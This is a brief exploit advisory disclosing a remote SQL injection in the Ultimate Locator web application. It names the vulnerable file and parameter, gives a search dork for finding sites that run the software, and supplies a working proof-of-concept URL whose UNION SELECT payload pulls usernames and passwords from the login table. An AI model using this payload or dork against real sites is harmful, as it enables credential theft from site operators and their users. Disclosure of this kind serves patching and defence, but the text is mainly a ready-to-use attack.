Ultimate Locator suffers from a remote SQL injection vulnerability.
429137160b75a3f7b44e26a49eca96e4b881cd161ab809fadbc9afb392402d56
# Exploit Title: Ultimate Locator SQL Injection Vulnerability
# Author: Robert Cooper ( Robert.Cooper [at] areyousecure.net )
# Software Link: http://www.ultimatelocator.com/
# Dork: "Powered by Ultimate Locator"
# Tested on: [Linux/Windows 7]
#Vulnerable File:
results_list.php
#Vulnerable parameter:
radius=
##############################################################
PoC:
http://www.example.com/locator/results_list.php?order=id&pageno=2&showsurrounding=1&zip=94102&zipsearch=Go&radius=-50 UNION ALL SELECT 1,2,3,4,5,6,7,group_concat(username,0x3a,password) FROM login--
##############################################################
www.areyousecure.net
www.websiteauditing.org
# Shouts to the Belegit crew